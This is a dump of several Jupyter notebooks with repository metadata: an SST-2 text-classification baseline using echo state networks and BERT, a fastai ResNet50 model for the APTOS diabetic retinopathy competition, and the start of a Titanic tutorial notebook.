"CPU times: user 0 ns, sys: 0 ns, total: 0 ns\nWall time: 9.78 µs\n"
],
[
"print(len(test1[0,0,:,0]))",
"512\n"
],
[
"plt.figure(figsize=(16,9))\nfor i in range(len(data1)):\n plt.plot(data2[i,:,j],test1[i,:,j,0], 'o')\nplt.savefig('fig2.png')\n%time",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb52871656197e43ea5d747ce7024cc133992ff7 | 26,460 | ipynb | Jupyter Notebook | notebooks_paper_2022/Baselines_v2/SST-2.ipynb | PlaytikaResearch/esntorch | 585369853e2bb7c46d782fd10469dd30597de2e3 | [
"MIT"
] | 1 | 2021-10-06T07:42:01.000Z | 2021-10-06T07:42:01.000Z | notebooks_paper_2022/Baselines_v2/SST-2.ipynb | PlaytikaResearch/esntorch | 585369853e2bb7c46d782fd10469dd30597de2e3 | [
"MIT"
] | null | null | null | notebooks_paper_2022/Baselines_v2/SST-2.ipynb | PlaytikaResearch/esntorch | 585369853e2bb7c46d782fd10469dd30597de2e3 | [
"MIT"
] | null | null | null | 39.2 | 471 | 0.591232 | [
[
[
"# SST-2\n# Simple Baselines using ``mean`` and ``last`` pooling",
"_____no_output_____"
],
[
"## Librairies",
"_____no_output_____"
]
],
[
[
"# !pip install transformers==4.8.2\n# !pip install datasets==1.7.0\n# !pip install ax-platform==0.1.20",
"_____no_output_____"
],
[
"import os\nimport sys\nsys.path.insert(0, os.path.abspath(\"../..\")) # comment this if library is pip installed",
"_____no_output_____"
],
[
"import io\nimport re\nimport pickle\nfrom timeit import default_timer as timer\n\nfrom tqdm.notebook import tqdm\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom datasets import load_dataset, Dataset, concatenate_datasets\nfrom transformers import AutoTokenizer\nfrom transformers import BertModel\nfrom transformers.data.data_collator import DataCollatorWithPadding\n\nfrom ax import optimize\nfrom ax.plot.contour import plot_contour\nfrom ax.plot.trace import optimization_trace_single_method\nfrom ax.service.managed_loop import optimize\nfrom ax.utils.notebook.plotting import render, init_notebook_plotting\n\nimport esntorch.core.reservoir as res\nimport esntorch.core.learning_algo as la\nimport esntorch.core.merging_strategy as ms\nimport esntorch.core.esn as esn",
"_____no_output_____"
],
[
"%config Completer.use_jedi = False\n%load_ext autoreload\n%autoreload 2",
"_____no_output_____"
],
[
"device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice",
"_____no_output_____"
],
[
"SEED = 42",
"_____no_output_____"
]
],
[
[
"## Global variables",
"_____no_output_____"
]
],
[
[
"CACHE_DIR = '~/Data/huggignface/' # put your path here\nRESULTS_FILE = 'Results/Baselines_v2/sst-2_results_.pkl' # put your path here",
"_____no_output_____"
]
],
[
[
"## Dataset",
"_____no_output_____"
]
],
[
[
"# download dataset\n\n# full train, mini train, and val sets\nraw_datasets = load_dataset('glue', 'sst2', cache_dir=CACHE_DIR)\nraw_datasets = raw_datasets.rename_column('sentence', 'text')\n\nfull_train_dataset = raw_datasets['train']\ntrain_dataset = full_train_dataset.train_test_split(train_size=0.3, shuffle=True)['train']\n\nval_dataset = raw_datasets['validation']\n\n# special test set\ntest_dataset = load_dataset('gpt3mix/sst2', split='test', cache_dir=CACHE_DIR)\n\ndef clean(example):\n example['text'] = example['text'].replace('-LRB-', '(').replace('-RRB-', ')').replace(r'\\/', r'/')\n example['label'] = np.abs(example['label'] - 1) # revert labels of test set\n return example\n\ntest_dataset = test_dataset.map(clean)\n\n# create dataset_d\ndataset_d = {}\n\ndataset_d = {\n 'full_train': full_train_dataset,\n 'train': train_dataset,\n 'val': val_dataset,\n 'test': test_dataset\n }",
"_____no_output_____"
],
[
"dataset_d",
"_____no_output_____"
],
[
"# tokenize\n\ntokenizer = AutoTokenizer.from_pretrained(\"bert-base-uncased\")\n\ndef tokenize_function(examples):\n return tokenizer(examples[\"text\"], padding=False, truncation=True, return_length=True)\n\nfor k, v in dataset_d.items():\n tmp = v.map(tokenize_function, batched=True)\n tmp = tmp.rename_column('length', 'lengths')\n tmp = tmp.sort(\"lengths\")\n tmp = tmp.rename_column('label', 'labels')\n tmp.set_format(type='torch', columns=['input_ids', 'attention_mask', 'labels', 'lengths'])\n \n dataset_d[k] = tmp\n\n# dataloaders\n\ndataloader_d = {}\n\nfor k, v in dataset_d.items():\n dataloader_d[k] = torch.utils.data.DataLoader(v, batch_size=256, collate_fn=DataCollatorWithPadding(tokenizer))",
"_____no_output_____"
],
[
"dataset_d",
"_____no_output_____"
]
],
[
[
"## Optimization",
"_____no_output_____"
]
],
[
[
"baseline_params = {\n 'embedding_weights': 'bert-base-uncased', # TEXT.vocab.vectors,\n 'distribution' : 'uniform', # uniform, gaussian\n 'input_dim' : 768, # dim of encoding!\n 'reservoir_dim' : 0, # not used\n 'bias_scaling' : 0.0, # not used\n 'sparsity' : 0.0, # not used\n 'spectral_radius' : None, \n 'leaking_rate': 0.5, # not used\n 'activation_function' : 'tanh',\n 'input_scaling' : 0.1,\n 'mean' : 0.0,\n 'std' : 1.0,\n 'learning_algo' : None,\n 'criterion' : None,\n 'optimizer' : None,\n 'merging_strategy' : None,\n 'lexicon' : None,\n 'bidirectional' : False,\n 'mode' : 'no_layer', # simple baseline\n 'device' : device,\n 'seed' : 4\n }",
"_____no_output_____"
],
[
"results_d = {}\n\nfor pooling_strategy in tqdm(['last', 'mean']):\n \n results_d[pooling_strategy] = {}\n \n for alpha in tqdm([0.1, 1.0, 10.0, 100.0]):\n \n results_d[pooling_strategy][alpha] = []\n \n # model\n baseline_params['merging_strategy'] = pooling_strategy\n baseline_params['mode'] = 'no_layer'\n print(baseline_params)\n ESN = esn.EchoStateNetwork(**baseline_params)\n ESN.learning_algo = la.RidgeRegression(alpha=alpha)\n ESN = ESN.to(device)\n\n # train\n t0 = timer()\n LOSS = ESN.fit(dataloader_d[\"full_train\"]) # full train set\n t1 = timer()\n acc = ESN.predict(dataloader_d[\"test\"], verbose=False)[1].item() # full test set\n\n # results\n results_d[pooling_strategy][alpha].append([acc, t1 - t0])\n \n # clean objects\n del ESN.learning_algo\n del ESN.criterion\n del ESN.merging_strategy\n del ESN\n torch.cuda.empty_cache()",
"_____no_output_____"
],
[
"results_d",
"_____no_output_____"
]
],
[
[
"## Results",
"_____no_output_____"
]
],
[
[
"# save results\n\nwith open(RESULTS_FILE, 'wb') as fh:\n pickle.dump(results_d, fh)",
"_____no_output_____"
],
[
"# # load results\n# with open(os.path.join(RESULTS_PATH, RESULTS_FILE), 'rb') as fh:\n# results_d = pickle.load(fh)",
"_____no_output_____"
],
[
"# results_d",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb5294c798a2286ccb71fff39441d396977818f4 | 359,202 | ipynb | Jupyter Notebook | nbs/CvCropDiabtrn070314.ipynb | yang-zhang/aptos2019-blindness-detection | 9f06be13ea468e5977e0552c0de1a1f8dbe836dc | [
"Apache-2.0"
] | null | null | null | nbs/CvCropDiabtrn070314.ipynb | yang-zhang/aptos2019-blindness-detection | 9f06be13ea468e5977e0552c0de1a1f8dbe836dc | [
"Apache-2.0"
] | null | null | null | nbs/CvCropDiabtrn070314.ipynb | yang-zhang/aptos2019-blindness-detection | 9f06be13ea468e5977e0552c0de1a1f8dbe836dc | [
"Apache-2.0"
] | null | null | null | 167.773003 | 219,356 | 0.892913 | [
[
[
"- https://www.kaggle.com/tanlikesmath/intro-aptos-diabetic-retinopathy-eda-starter\n- https://medium.com/@btahir/a-quick-guide-to-using-regression-with-image-data-in-fastai-117304c0af90\n- add diabetic-retinopathy-detection training data (cropped)",
"_____no_output_____"
],
[
"# params",
"_____no_output_____"
]
],
[
[
"PRFX = 'CvCropDiabtrn070314'\np_prp = '../output/Prep0703'\np_o = f'../output/{PRFX}'\n\nSEED = 111\n\ndbg = False\nif dbg:\n dbgsz = 500\n\nBS = 256\nSZ = 224\nFP16 = True\n\nimport multiprocessing\nmultiprocessing.cpu_count() # 2\n\n\nfrom fastai.vision import *\nxtra_tfms = []\n# xtra_tfms += [rgb_randomize(channel=i, thresh=1e-4) for i in range(3)]\n\nparams_tfms = dict(\n do_flip=True,\n flip_vert=False,\n max_rotate=10,\n max_warp=0,\n max_zoom=1.1,\n p_affine=0.5,\n max_lighting=0.2,\n p_lighting=0.5,\n xtra_tfms=xtra_tfms)\n\nresize_method = ResizeMethod.CROP\npadding_mode = 'zeros'\n\nUSE_TTA = True",
"_____no_output_____"
]
],
[
[
"# setup",
"_____no_output_____"
]
],
[
[
"import fastai\nprint('fastai.__version__: ', fastai.__version__)\n\nimport random \nimport numpy as np\nimport torch\nimport os\n\ndef set_torch_seed(seed=SEED):\n os.environ['PYTHONHASHSEED'] = str(seed)\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n \n if torch.cuda.is_available(): \n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) \n torch.backends.cudnn.deterministic = True \n torch.backends.cudnn.benchmark = False\n\nset_torch_seed()",
"fastai.__version__: 1.0.54\n"
],
[
"from fastai import *\nfrom fastai.vision import *\nimport pandas as pd\n\nimport scipy as sp\nfrom sklearn.metrics import cohen_kappa_score\n\ndef quadratic_weighted_kappa(y1, y2):\n return cohen_kappa_score(y1, y2, weights='quadratic')",
"_____no_output_____"
]
],
[
[
"# preprocess",
"_____no_output_____"
]
],
[
[
"img2grd = []\n\np = '../input/aptos2019-blindness-detection'\npp = Path(p)\ntrain = pd.read_csv(pp/'train.csv')\ntest = pd.read_csv(pp/'test.csv')\nlen_blnd = len(train)\nlen_blnd_test = len(test)\n\nimg2grd_blnd = [(f'{p_prp}/aptos2019-blindness-detection/train_images/{o[0]}.png',o[1]) for o in train.values]\n\nlen_blnd, len_blnd_test",
"_____no_output_____"
],
[
"img2grd += img2grd_blnd\ndisplay(len(img2grd))\ndisplay(Counter(o[1] for o in img2grd).most_common())",
"_____no_output_____"
],
[
"p = '../input/diabetic-retinopathy-detection'\npp = Path(p)\ntrain=pd.read_csv(pp/'trainLabels.csv')\n\nimg2grd_diab_train=[(f'{p_prp}/diabetic-retinopathy-detection/train_images/{o[0]}.jpeg',o[1]) for o in train.values]\nimg2grd += img2grd_diab_train\ndisplay(len(img2grd))\ndisplay(Counter(o[1] for o in img2grd).most_common())",
"_____no_output_____"
],
[
"if np.all([Path(o[0]).exists() for o in img2grd]): print('All files are here!')",
"All files are here!\n"
],
[
"df = pd.DataFrame(img2grd)\ndf.columns = ['fnm', 'target']\n\ndf.shape",
"_____no_output_____"
],
[
"set_torch_seed()\nidx_blnd_train = np.where(df.fnm.str.contains('aptos2019'))[0]\nidx_val = np.random.choice(idx_blnd_train, len_blnd_test, replace=False)\ndf['is_val']=False\ndf.loc[idx_val, 'is_val']=True\n\nif dbg:\n df=df.head(dbgsz)",
"_____no_output_____"
]
],
[
[
"# dataset",
"_____no_output_____"
]
],
[
[
"tfms = get_transforms(**params_tfms)\n\ndef get_data(sz, bs):\n src = (ImageList.from_df(df=df,path='./',cols='fnm') \n .split_from_df(col='is_val') \n .label_from_df(cols='target', \n label_cls=FloatList)\n )\n\n data= (src.transform(tfms,\n size=sz,\n resize_method=resize_method,\n padding_mode=padding_mode) #Data augmentation\n .databunch(bs=bs) #DataBunch\n .normalize(imagenet_stats) #Normalize \n )\n return data\n\nbs = BS \nsz = SZ\nset_torch_seed()\ndata = get_data(sz, bs)",
"_____no_output_____"
],
[
"data.show_batch(rows=3, figsize=(7,6))",
"_____no_output_____"
]
],
[
[
"# model",
"_____no_output_____"
]
],
[
[
"%%time\n# Downloading: \"https://download.pytorch.org/models/resnet50-19c8e357.pth\" to /tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth\n\n# Making pretrained weights work without needing to find the default filename\nif not os.path.exists('/tmp/.cache/torch/checkpoints/'):\n os.makedirs('/tmp/.cache/torch/checkpoints/')\n!cp '../input/pytorch-vision-pretrained-models/resnet50-19c8e357.pth' '/tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth'",
"CPU times: user 3.36 ms, sys: 52.1 ms, total: 55.5 ms\nWall time: 1.01 s\n"
],
[
"learn = cnn_learner(data, \n base_arch = models.resnet50, \n path=p_o, ps=0.2)\nlearn.loss = MSELossFlat\n\nif FP16: learn = learn.to_fp16()",
"_____no_output_____"
],
[
"%%time\nlearn.freeze()\nlearn.lr_find()",
"_____no_output_____"
],
[
"learn.recorder.plot(suggestion=True)",
"Min numerical gradient: 2.75E-02\nMin loss divided by 10: 8.32E-03\n"
],
[
"learn.recorder.plot()",
"_____no_output_____"
],
[
"set_torch_seed()\nlearn.fit_one_cycle(4, max_lr = 1e-2)",
"_____no_output_____"
],
[
"learn.recorder.plot_losses()\n# learn.recorder.plot_metrics()",
"_____no_output_____"
],
[
"learn.save('mdl-frozen')",
"_____no_output_____"
],
[
"learn.unfreeze()",
"_____no_output_____"
],
[
"%%time\nlearn.lr_find()\nlearn.recorder.plot(suggestion=True)",
"_____no_output_____"
],
[
"set_torch_seed()\nlearn.fit_one_cycle(6, max_lr=slice(1e-6,1e-3))\n",
"_____no_output_____"
],
[
"!nvidia-smi",
"Thu Jul 4 00:02:34 2019 \r\n+-----------------------------------------------------------------------------+\r\n| NVIDIA-SMI 418.56 Driver Version: 418.56 CUDA Version: 10.1 |\r\n|-------------------------------+----------------------+----------------------+\r\n| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |\r\n| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |\r\n|===============================+======================+======================|\r\n| 0 Tesla V100-SXM2... Off | 00000000:00:1E.0 Off | 0 |\r\n| N/A 49C P0 55W / 300W | 13815MiB / 16130MiB | 0% Default |\r\n+-------------------------------+----------------------+----------------------+\r\n \r\n+-----------------------------------------------------------------------------+\r\n| Processes: GPU Memory |\r\n| GPU PID Type Process name Usage |\r\n|=============================================================================|\r\n+-----------------------------------------------------------------------------+\r\n"
],
[
"learn.recorder.plot_losses()\n# learn.recorder.plot_metrics()",
"_____no_output_____"
],
[
"learn.save('mdl')",
"_____no_output_____"
]
],
[
[
"# validate and thresholding",
"_____no_output_____"
]
],
[
[
"learn = learn.to_fp32()\n\nlearn = learn.load('mdl')",
"_____no_output_____"
],
[
"%%time\nset_torch_seed()\npreds_val_tta, y_val = learn.TTA(ds_type=DatasetType.Valid)",
"_____no_output_____"
],
[
"%%time\nset_torch_seed()\npreds_val, y_val = learn.get_preds(ds_type=DatasetType.Valid)",
"CPU times: user 1.64 s, sys: 1.42 s, total: 3.06 s\nWall time: 57 s\n"
],
[
"preds_val = preds_val.numpy().squeeze()\npreds_val_tta = preds_val_tta.numpy().squeeze()\ny_val= y_val.numpy()",
"_____no_output_____"
],
[
"np.save(f'{p_o}/preds_val.npy', preds_val)\nnp.save(f'{p_o}/preds_val_tta.npy', preds_val_tta)\nnp.save(f'{p_o}/y_val.npy', y_val)",
"_____no_output_____"
],
[
"# https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/88773#latest-515044\n# We used OptimizedRounder given by hocop1. https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/76107#480970\n# put numerical value to one of bins\ndef to_bins(x, borders):\n for i in range(len(borders)):\n if x <= borders[i]:\n return i\n return len(borders)\n\nclass Hocop1OptimizedRounder(object):\n def __init__(self):\n self.coef_ = 0\n\n def _loss(self, coef, X, y, idx):\n X_p = np.array([to_bins(pred, coef) for pred in X])\n ll = -quadratic_weighted_kappa(y, X_p)\n return ll\n\n def fit(self, X, y):\n coef = [1.5, 2.0, 2.5, 3.0]\n golden1 = 0.618\n golden2 = 1 - golden1\n ab_start = [(1, 2), (1.5, 2.5), (2, 3), (2.5, 3.5)]\n for it1 in range(10):\n for idx in range(4):\n # golden section search\n a, b = ab_start[idx]\n # calc losses\n coef[idx] = a\n la = self._loss(coef, X, y, idx)\n coef[idx] = b\n lb = self._loss(coef, X, y, idx)\n for it in range(20):\n # choose value\n if la > lb:\n a = b - (b - a) * golden1\n coef[idx] = a\n la = self._loss(coef, X, y, idx)\n else:\n b = b - (b - a) * golden2\n coef[idx] = b\n lb = self._loss(coef, X, y, idx)\n self.coef_ = {'x': coef}\n\n def predict(self, X, coef):\n X_p = np.array([to_bins(pred, coef) for pred in X])\n return X_p\n\n def coefficients(self):\n return self.coef_['x']",
"_____no_output_____"
],
[
"# https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/76107#480970\nclass AbhishekOptimizedRounder(object):\n def __init__(self):\n self.coef_ = 0\n\n def _kappa_loss(self, coef, X, y):\n X_p = np.copy(X)\n for i, pred in enumerate(X_p):\n if pred < coef[0]:\n X_p[i] = 0\n elif pred >= coef[0] and pred < coef[1]:\n X_p[i] = 1\n elif pred >= coef[1] and pred < coef[2]:\n X_p[i] = 2\n elif pred >= coef[2] and pred < coef[3]:\n X_p[i] = 3\n else:\n X_p[i] = 4\n\n ll = quadratic_weighted_kappa(y, X_p)\n return -ll\n\n def fit(self, X, y):\n loss_partial = partial(self._kappa_loss, X=X, y=y)\n initial_coef = [0.5, 1.5, 2.5, 3.5]\n self.coef_ = sp.optimize.minimize(loss_partial, initial_coef, method='nelder-mead')\n\n def predict(self, X, coef):\n X_p = np.copy(X)\n for i, pred in enumerate(X_p):\n if pred < coef[0]:\n X_p[i] = 0\n elif pred >= coef[0] and pred < coef[1]:\n X_p[i] = 1\n elif pred >= coef[1] and pred < coef[2]:\n X_p[i] = 2\n elif pred >= coef[2] and pred < coef[3]:\n X_p[i] = 3\n else:\n X_p[i] = 4\n return X_p\n\n def coefficients(self):\n return self.coef_['x']",
"_____no_output_____"
],
[
"def bucket(preds_raw, coef = [0.5, 1.5, 2.5, 3.5]):\n preds = np.zeros(preds_raw.shape)\n for i, pred in enumerate(preds_raw):\n if pred < coef[0]:\n preds[i] = 0\n elif pred >= coef[0] and pred < coef[1]:\n preds[i] = 1\n elif pred >= coef[1] and pred < coef[2]:\n preds[i] = 2\n elif pred >= coef[2] and pred < coef[3]:\n preds[i] = 3\n else:\n preds[i] = 4\n return preds",
"_____no_output_____"
],
[
"optnm2coefs = {'simple': [0.5, 1.5, 2.5, 3.5]}",
"_____no_output_____"
],
[
"%%time\nset_torch_seed()\noptR = Hocop1OptimizedRounder()\noptR.fit(preds_val_tta, y_val)\noptnm2coefs['hocop1_tta'] = optR.coefficients()",
"CPU times: user 13.9 s, sys: 0 ns, total: 13.9 s\nWall time: 13.9 s\n"
],
[
"%%time\nset_torch_seed()\noptR = Hocop1OptimizedRounder()\noptR.fit(preds_val, y_val)\noptnm2coefs['hocop1'] = optR.coefficients()",
"CPU times: user 13.8 s, sys: 0 ns, total: 13.8 s\nWall time: 13.8 s\n"
],
[
"%%time\nset_torch_seed()\noptR = AbhishekOptimizedRounder()\noptR.fit(preds_val_tta, y_val)\noptnm2coefs['abhishek_tta'] = optR.coefficients()",
"CPU times: user 1.86 s, sys: 0 ns, total: 1.86 s\nWall time: 1.86 s\n"
],
[
"%%time\nset_torch_seed()\noptR = AbhishekOptimizedRounder()\noptR.fit(preds_val, y_val)\noptnm2coefs['abhishek'] = optR.coefficients()",
"CPU times: user 1.8 s, sys: 0 ns, total: 1.8 s\nWall time: 1.79 s\n"
],
[
"optnm2coefs",
"_____no_output_____"
],
[
"optnm2preds_val_grd = {k: bucket(preds_val, coef) for k,coef in optnm2coefs.items()}\noptnm2qwk = {k: quadratic_weighted_kappa(y_val, preds) for k,preds in optnm2preds_val_grd.items()}",
"_____no_output_____"
],
[
"optnm2qwk",
"_____no_output_____"
],
[
"Counter(y_val).most_common()",
"_____no_output_____"
],
[
"preds_val_grd = optnm2preds_val_grd['abhishek'].squeeze()",
"_____no_output_____"
],
[
"preds_val_grd.mean()",
"_____no_output_____"
],
[
"Counter(preds_val_grd).most_common()",
"_____no_output_____"
],
[
"list(zip(preds_val_grd, y_val))[:10]",
"_____no_output_____"
],
[
"(preds_val_grd== y_val.squeeze()).mean()",
"_____no_output_____"
],
[
"pickle.dump(optnm2qwk, open(f'{p_o}/optnm2qwk.p', 'wb'))\npickle.dump(optnm2preds_val_grd, open(f'{p_o}/optnm2preds_val_grd.p', 'wb'))\npickle.dump(optnm2coefs, open(f'{p_o}/optnm2coefs.p', 'wb'))",
"_____no_output_____"
]
],
[
[
"# testing",
"_____no_output_____"
],
[
"This goes to Kernel!!",
"_____no_output_____"
],
[
"## params",
"_____no_output_____"
]
],
[
[
"PRFX = 'CvCropDiabtrn070314'\np_o = f'../output/{PRFX}'\n\nSEED = 111\n\ndbg = False\nif dbg:\n dbgsz = 500\n\nBS = 128\nSZ = 224\n\nfrom fastai.vision import *\nxtra_tfms = []\n# xtra_tfms += [rgb_randomize(channel=i, thresh=1e-4) for i in range(3)]\n\nparams_tfms = dict(\n do_flip=True,\n flip_vert=False,\n max_rotate=10,\n max_warp=0,\n max_zoom=1.1,\n p_affine=0.5,\n max_lighting=0.2,\n p_lighting=0.5,\n xtra_tfms=xtra_tfms)\n\nresize_method = ResizeMethod.CROP\npadding_mode = 'zeros'\n\nUSE_TTA = True\n\nimport fastai\nprint(fastai.__version__)",
"1.0.54\n"
]
],
[
[
"## setup",
"_____no_output_____"
]
],
[
[
"import fastai\nprint('fastai.__version__: ', fastai.__version__)\n\nimport random \nimport numpy as np\nimport torch\nimport os\n\ndef set_torch_seed(seed=SEED):\n os.environ['PYTHONHASHSEED'] = str(seed)\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n \n if torch.cuda.is_available(): \n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) \n torch.backends.cudnn.deterministic = True \n torch.backends.cudnn.benchmark = False\n\nset_torch_seed()",
"fastai.__version__: 1.0.54\n"
],
[
"from fastai import *\nfrom fastai.vision import *\nimport pandas as pd\n",
"_____no_output_____"
]
],
[
[
"## preprocess",
"_____no_output_____"
]
],
[
[
"img2grd = []",
"_____no_output_____"
],
[
"p = '../input/aptos2019-blindness-detection'\npp = Path(p)\ntrain = pd.read_csv(pp/'train.csv')\ntest = pd.read_csv(pp/'test.csv')\nlen_blnd = len(train)\nlen_blnd_test = len(test)\n\nimg2grd_blnd = [(f'{p_prp}/aptos2019-blindness-detection/train_images/{o[0]}.png',o[1]) for o in train.values]\n\nlen_blnd, len_blnd_test",
"_____no_output_____"
],
[
"img2grd += img2grd_blnd\ndisplay(len(img2grd))\ndisplay(Counter(o[1] for o in img2grd).most_common())",
"_____no_output_____"
],
[
"if np.all([Path(o[0]).exists() for o in img2grd]): print('All files are here!')",
"All files are here!\n"
],
[
"df = pd.DataFrame(img2grd)\ndf.columns = ['fnm', 'target']\n\ndf.shape",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"set_torch_seed()\nidx_blnd_train = np.where(df.fnm.str.contains('aptos2019-blindness-detection/train_images'))[0]\nidx_val = np.random.choice(idx_blnd_train, len_blnd_test, replace=False)\ndf['is_val']=False\ndf.loc[idx_val, 'is_val']=True",
"_____no_output_____"
],
[
"if dbg:\n df=df.head(dbgsz)",
"_____no_output_____"
]
],
[
[
"## dataset",
"_____no_output_____"
]
],
[
[
"tfms = get_transforms(**params_tfms)\n\ndef get_data(sz, bs):\n src = (ImageList.from_df(df=df,path='./',cols='fnm') \n .split_from_df(col='is_val') \n .label_from_df(cols='target', \n label_cls=FloatList)\n )\n\n data= (src.transform(tfms,\n size=sz,\n resize_method=resize_method,\n padding_mode=padding_mode) #Data augmentation\n .databunch(bs=bs,num_workers=2) #DataBunch\n .normalize(imagenet_stats) #Normalize \n )\n return data\n\nbs = BS \nsz = SZ\nset_torch_seed()\ndata = get_data(sz, bs)",
"_____no_output_____"
]
],
[
[
"data.show_batch(rows=3, figsize=(7,6))",
"_____no_output_____"
]
],
[
[
"## model",
"_____no_output_____"
]
],
[
[
"%%time\n# Downloading: \"https://download.pytorch.org/models/resnet50-19c8e357.pth\" to /tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth\n\n# Making pretrained weights work without needing to find the default filename\nif not os.path.exists('/tmp/.cache/torch/checkpoints/'):\n os.makedirs('/tmp/.cache/torch/checkpoints/')\n!cp '../input/pytorch-vision-pretrained-models/resnet50-19c8e357.pth' '/tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth'",
"CPU times: user 6.56 ms, sys: 53.9 ms, total: 60.5 ms\nWall time: 1.01 s\n"
],
[
"set_torch_seed()\nlearn = cnn_learner(data, \n base_arch = models.resnet50, \n path=p_o)\nlearn.loss = MSELossFlat\n\nlearn = learn.load('mdl')",
"_____no_output_____"
],
[
"df_test = pd.read_csv('../input/aptos2019-blindness-detection/test.csv')\ndf_test.head()",
"_____no_output_____"
],
[
"learn.data.add_test(\n ImageList.from_df(df_test,\n f'{p_prp}/aptos2019-blindness-detection/',\n folder='test_images',\n suffix='.png'))",
"_____no_output_____"
],
[
"%%time\n# Predictions for test set\nset_torch_seed()\npreds_tst_tta, _ = learn.TTA(ds_type=DatasetType.Test)",
"_____no_output_____"
],
[
"%%time\n# Predictions for test set\nset_torch_seed()\npreds_tst, _ = learn.get_preds(ds_type=DatasetType.Test)",
"CPU times: user 1.74 s, sys: 1.1 s, total: 2.84 s\nWall time: 1min 3s\n"
],
[
"preds_tst = preds_tst.numpy().squeeze()\npreds_tst_tta = preds_tst_tta.numpy().squeeze()",
"_____no_output_____"
],
[
"np.save(f'{p_o}/preds_tst.npy', preds_tst)\nnp.save(f'{p_o}/preds_tst_tta.npy', preds_tst_tta)",
"_____no_output_____"
],
[
"preds_tst2use = preds_tst_tta",
"_____no_output_____"
],
[
"def bucket(preds_raw, coef = [0.5, 1.5, 2.5, 3.5]):\n preds = np.zeros(preds_raw.shape)\n for i, pred in enumerate(preds_raw):\n if pred < coef[0]:\n preds[i] = 0\n elif pred >= coef[0] and pred < coef[1]:\n preds[i] = 1\n elif pred >= coef[1] and pred < coef[2]:\n preds[i] = 2\n elif pred >= coef[2] and pred < coef[3]:\n preds[i] = 3\n else:\n preds[i] = 4\n return preds",
"_____no_output_____"
],
[
"optnm2qwk = pickle.load(open(f'{p_o}/optnm2qwk.p','rb'))\noptnm2coefs = pickle.load(open(f'{p_o}/optnm2coefs.p','rb'))",
"_____no_output_____"
],
[
"optnm2qwk",
"_____no_output_____"
],
[
"coef = optnm2coefs['abhishek']\npreds_tst_grd = bucket(preds_tst2use, coef)",
"_____no_output_____"
],
[
"Counter(preds_tst_grd.squeeze()).most_common()",
"_____no_output_____"
]
],
[
[
"## submit",
"_____no_output_____"
]
],
[
[
"subm = pd.read_csv(\"../input/aptos2019-blindness-detection/test.csv\")\nsubm['diagnosis'] = preds_tst_grd.squeeze().astype(int)\nsubm.head()",
"_____no_output_____"
],
[
"subm.diagnosis.value_counts()",
"_____no_output_____"
],
[
"subm.to_csv(f\"{p_o}/submission.csv\", index=False)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"raw",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"raw"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb52967b2976a727f390fd91a15c50e04b6df003 | 152,685 | ipynb | Jupyter Notebook | kaggle/firstSuccessSubmission.ipynb | younthu/kaggle | 3170e64215dbec04c2f91df91d7be7cb0442c676 | [
"Apache-2.0"
] | null | null | null | kaggle/firstSuccessSubmission.ipynb | younthu/kaggle | 3170e64215dbec04c2f91df91d7be7cb0442c676 | [
"Apache-2.0"
] | null | null | null | kaggle/firstSuccessSubmission.ipynb | younthu/kaggle | 3170e64215dbec04c2f91df91d7be7cb0442c676 | [
"Apache-2.0"
] | null | null | null | 47.32951 | 11,506 | 0.463811 | [
[
[
"# from https://www.kaggle.com/carlbeckerling/kaggle-titanic-tutorial\nimport pandas as pd\n\ntest = pd.read_csv('./test.csv')\ntrain = pd.read_csv('./train.csv')\ntest.shape,train.shape",
"_____no_output_____"
],
[
"test.info()\ntrain.info()",
